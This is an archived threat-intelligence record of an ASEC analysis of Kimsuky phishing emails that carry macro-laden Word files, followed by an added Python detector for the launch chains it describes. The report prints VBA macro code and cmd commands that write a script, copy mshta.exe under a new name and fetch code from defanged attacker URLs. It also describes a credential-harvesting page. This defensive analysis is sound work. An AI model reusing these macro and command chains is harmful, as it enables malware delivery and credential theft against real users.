{
	"id": "ec6c4e8e-c599-4561-8387-832ef38734c1",
	"created_at": "2026-04-06T00:16:29.456151Z",
	"updated_at": "2026-04-10T03:37:41.115745Z",
	"deleted_at": null,
	"sha1_hash": "7558a8942a7a3b6a31ed61a0da636e489f5287dc",
	"title": "Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3017616,
	"plain_text": "Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)\nBy ATCP\nPublished: 2022-07-25 · Archived: 2026-04-05 21:48:26 UTC\nThe ASEC analysis team has discovered the continuous distribution of malicious Word files with North Korea-related materials. The discovered Word files included the type discussed in the “Overall Organizational Analysis Report of 2021 Kimsuky Attack Word Files” (AhnLab TIP) and in ‘Word Files Related to Diplomacy and National Defense Being Distributed’, as well as a type that uses mshta.\nThe malicious Word files are distributed under various names, such as the following.\nCV of Kim **(Korean American Organization of **,220711).doc\nYang**_** Foundation interim report(220716).doc\nConsultation Request.doc\nType 1\nThe malicious Word file titled ‘Consultation Request.doc’ was most likely distributed through the email shown below. The attacker impersonated a person from a Korean organization and sent an email requesting a consultation on a report.\nhttps://asec.ahnlab.com/en/37396/\nPage 1 of 7\nThe first attack email has no attachment. Only when the user responds favorably does the attacker send a reply containing a URL from which the user is to download a malicious Word file.\nClicking the link in the second email displays a webpage containing another malicious URL. Clicking the download button redirects the user to hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?hl=kr&passive=true&<omitted>rtnurl=aHR0cHM6Ly9kb2NzLmdv<omitted>. The URL can no longer be accessed. Judging from the URL, whose path imitates the structure of a Google account sign-in page, the page most likely harvested the user's login credentials and then served the malicious Word file from the location held in the base64-encoded rtnurl parameter (the visible part of that value decodes to the start of an https:// URL).\nOpening the Word file shows an image asking the user to enable macros by clicking the Enable Content button. If the user complies, the file displays text related to a consultation request, making it hard to notice that anything malicious has happened.\nThe file contains a VBA macro that connects to a certain URL. Part of the macro code is shown below; the Reserve routine is cut off in the excerpt. Note that the CreateObject call is split across two string literals (\"CreateObje\" & \"ct(\") to hinder keyword-based scanning.\nSub Reserve(pth)\n Documents.Add\n cnt = \"On Error Resume Next:Set mx = CreateObje\" & \"ct(\"\"Microsoft.XMLHTTP\"\"):mx.open \"\"GET\"\", \"\"hxxp://asss\nSub AutoOpen()\n On Error Resume Next\n pw = \"1qaz2wsx\"\n Weed pw\n obt = \"winmgmts:win32_process\"\n Set wm = GetObject(obt)\n pth = Templates(1).Path & \"\\version.ini\"\n cd = \"wscript.exe //e:vbscript //b\"\n wm.Create cd & pth\nEnd Sub\nWhen the macro runs, it writes version.ini to the AppData\\Roaming\\Microsoft\\Templates folder (Templates(1).Path) and then launches it through wscript.exe. Two details matter for detection: the process is created through WMI (winmgmts:win32_process, Win32_Process.Create) rather than directly from Word, so wscript.exe is not a child of WINWORD.EXE, and the //e:vbscript switch forces the VBScript engine regardless of the file's .ini extension.\nwscript.exe //e:vbscript //b %AppData%\\Microsoft\\Templates\\version.ini\nThe beginning of version.ini reads as follows.\nOn Error Resume Next:Set mx = CreateObject(\"Microsoft.XMLHTTP\"):mx.open \"GET\", \"hxxp://asssambly.mywebcommunity\n(version.ini)\nAs the URL can no longer be accessed, it is not possible to know what the script does next. It likely engaged in malicious behaviors such as leaking user PC information, as described in the previous post ‘Word Document Attack Targeting Companies Specialized in Carbon Emissions’.\nType 2\nType 2 is distributed as a file related to a specific webinar and accesses its C2 through mshta. Like Type 1, the Word file shows an image prompting the user to enable macros. If the user does so, the file shows text about a webinar on a North Korea-related topic.\nThe file also contains a VBA macro, shown below.\nSub AutoOpen()\n jsfds = \"cmd /c copy %windir%\\system32\\mshta.exe %tmp%\\gtfmon.exe\"\n Shell jsfds, 0\n jsfds = \"cmd /c timeout /t 7 >NUL && %tmp%\\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php\"\n Shell jsfds, 0\nEnd Sub\nWhen the macro runs, it copies mshta.exe to the TEMP folder as gtfmon.exe, waits seven seconds, and then runs the renamed copy against a certain URL, both steps through cmd; the window style 0 passed to Shell keeps the console windows hidden. Copying mshta.exe under a different name is meant to evade monitoring that keys on the mshta.exe file name, although the copy still carries MSHTA.EXE in its version resource.\ncmd /c timeout /t 7 >NUL && %tmp%\\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php\nAgain, the URL can no longer be accessed, so further behavior cannot be confirmed. As with Type 1, the script served from it likely performed malicious behaviors such as leaking user PC information.\nAs malicious Word files containing North Korea-related materials are continuously being discovered, users need to take caution. Since attackers distribute malicious files while impersonating legitimate senders, check the sender's email address and take care when opening attachments or clicking links.\n[File Detection]\nDownloader/DOC.Kimsuky\nMD5\n357ef37979b02b08120895ae5175eb0a\n7fe055d5aa72bd50470da61985e12a8a\nURL\nhttp[:]//asssambly[.]mywebcommunity[.]org/file/upload/list[.]php?query=1\nhttp[:]//freunkown1[.]sportsontheweb[.]net/h[.]php\nAdditional IOCs and detailed analysis are available on AhnLab TIP.\nSource: https://asec.ahnlab.com/en/37396/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/37396/"
	],
	"report_names": [
		"37396"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434589,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7558a8942a7a3b6a31ed61a0da636e489f5287dc.pdf",
		"text": "https://archive.orkl.eu/7558a8942a7a3b6a31ed61a0da636e489f5287dc.txt",
		"img": "https://archive.orkl.eu/7558a8942a7a3b6a31ed61a0da636e489f5287dc.jpg"
	}
}
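The two macro launch chains in the report (Type 1: a version.ini payload run through wscript.exe with an engine override, spawned via WMI; Type 2: mshta.exe copied to %TEMP% as gtfmon.exe and pointed at a remote URL) each leave a distinct mark in process-creation telemetry. The following is an added example, not part of the ASEC report or of this record, showing how to triage such events. It assumes Sysmon Event ID 1 field names (Image, OriginalFileName, ParentImage, CommandLine); the sample events are constructed for this example, the remote URL is a placeholder rather than the report's IOC, and the rule names are the example's own.

```python
"""Flag the Type 1 and Type 2 macro launch chains in process-creation events.

Added example; not code from the ASEC report. Events use Sysmon Event ID 1
field names. SAMPLE_EVENTS are constructed for this example (not real
telemetry); the URL is a placeholder, not the IOC from the report.
"""
import ntpath
import re
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Type 1: Word creates the process through Win32_Process.Create, so the
    # parent is WmiPrvSE.exe, not WINWORD.EXE, and the script is named *.ini.
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"wscript.exe //e:vbscript //b C:\Users\u\AppData\Roaming\Microsoft\Templates\version.ini"},
    # Type 2, step 1: Shell() from the macro, so cmd.exe is a child of Word.
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"cmd /c copy C:\Windows\system32\mshta.exe C:\Users\u\AppData\Local\Temp\gtfmon.exe"},
    # Type 2, step 2: the renamed copy keeps MSHTA.EXE in its PE version
    # resource, which Sysmon reports as OriginalFileName. Placeholder URL.
    {"Image": r"C:\Users\u\AppData\Local\Temp\gtfmon.exe", "OriginalFileName": "MSHTA.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Users\u\AppData\Local\Temp\gtfmon.exe http://example.invalid/h.php"},
    # Benign controls: a real .vbs logon script and a local .hta.
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe //e:vbscript //b \\fileserver\netlogon\logon.vbs"},
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'},
]


def split_cmdline(cmdline: str) -> List[str]:
    """Tokenise a Windows command line, keeping quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def triage(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    hits: List[str] = []
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    argv = split_cmdline(event.get("CommandLine", ""))
    lowered = [a.lower() for a in argv]

    # Classic Office-spawns-shell rule. Catches Type 2 (Shell from VBA) but
    # not Type 1, whose WMI-created process has WmiPrvSE.exe as parent.
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")

    # Type 1: //e:<engine> makes the script host ignore the extension, so the
    # payload can live in version.ini. Flag an engine override whose script
    # argument lacks a script extension.
    if image in SCRIPT_HOSTS and any(a.startswith("//e:") for a in lowered[1:]):
        script_args = [a for a in argv[1:] if not a.startswith("/")]
        if script_args and ntpath.splitext(script_args[-1])[1].lower() not in SCRIPT_EXTENSIONS:
            hits.append("script_host_engine_override")

    # Type 2, step 1: cmd.exe copying mshta.exe to a new name/location.
    if image == "cmd.exe" and "copy" in lowered and any(
            ntpath.basename(a).lower() == "mshta.exe" for a in argv):
        hits.append("mshta_copy")

    # Type 2, step 2: version resource says MSHTA.EXE but the on-disk name
    # differs, and/or mshta is handed a remote URL instead of a local .hta.
    if original == "mshta.exe":
        if image != "mshta.exe":
            hits.append("renamed_mshta")
        if any(URL_RE.match(a) for a in argv[1:]):
            hits.append("mshta_remote_hta")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each alerting event to the rules it matched."""
    results: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        hits = triage(event)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"], "->", ", ".join(rules))
```

The point of pairing the rules is that neither chain is caught by the parent-child rule alone: Type 1 breaks the WINWORD.EXE lineage through WMI, and Type 2's second stage runs under a name that a plain image-name rule for mshta.exe never sees, so OriginalFileName (or an equivalent hash/version check) is what ties gtfmon.exe back to mshta.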